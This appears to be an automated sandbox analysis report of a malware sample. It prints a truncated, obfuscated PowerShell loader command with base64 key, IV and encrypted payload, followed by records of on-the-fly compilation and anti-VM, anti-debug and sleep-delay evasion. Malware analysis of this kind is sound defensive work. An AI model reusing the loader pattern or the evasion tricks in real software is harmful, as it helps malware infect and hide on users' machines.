Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"			Jump to behavior

Source: file.exe	Static PE information: section name: .CLR_UEF
Source: file.exe	Static PE information: section name: .didat
Source: file.exe	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_054454E1 push edi; ret	0_2_054454E7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_054454BD push edi; ret	0_2_054454C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_05440770 push esp; ret	0_2_05440771
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00BF41D0 push C370E50Ah; ret	1_2_00BF41E8

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 7036, type: MEMORYSTR

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 5390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 5680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 8680000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009836E0 rdtsc

0_2_009836E0

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4203			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4031			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.dll

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 9.4 %

Source: C:\Users\user\Desktop\file.exe TID: 7008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2568	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4908	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2596	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009846C0 GetSystemInfo,

0_2_009846C0

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW2
Source: powershell.exe, 00000001.00000002.1741341041.0000000007079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
Source: RegAsm.exe, 00000005.00000002.1851549832.0000000000ED5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.1851700929.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-57136

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009836E0 rdtsc

0_2_009836E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_004460D0 LdrInitializeThunk,

5_2_004460D0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00992180 IsDebuggerPresent,RaiseException,

0_2_00992180

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0096F380 GetProcessHeap,RtlAllocateHeap,

0_2_0096F380

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B75BF0 VirtualProtect,GetTickCount,VirtualProtect,GetSystemInfo,SetConsoleCtrlHandler,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,DebugBreak,SleepEx,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,InitializeCriticalSection,RtlAddVectoredExceptionHandler,SetUnhandledExceptionFilter,InitializeCriticalSection,InitializeCriticalSection,VirtualAlloc,DebugBreak,InitializeCriticalSection,		0_2_00B75BF0
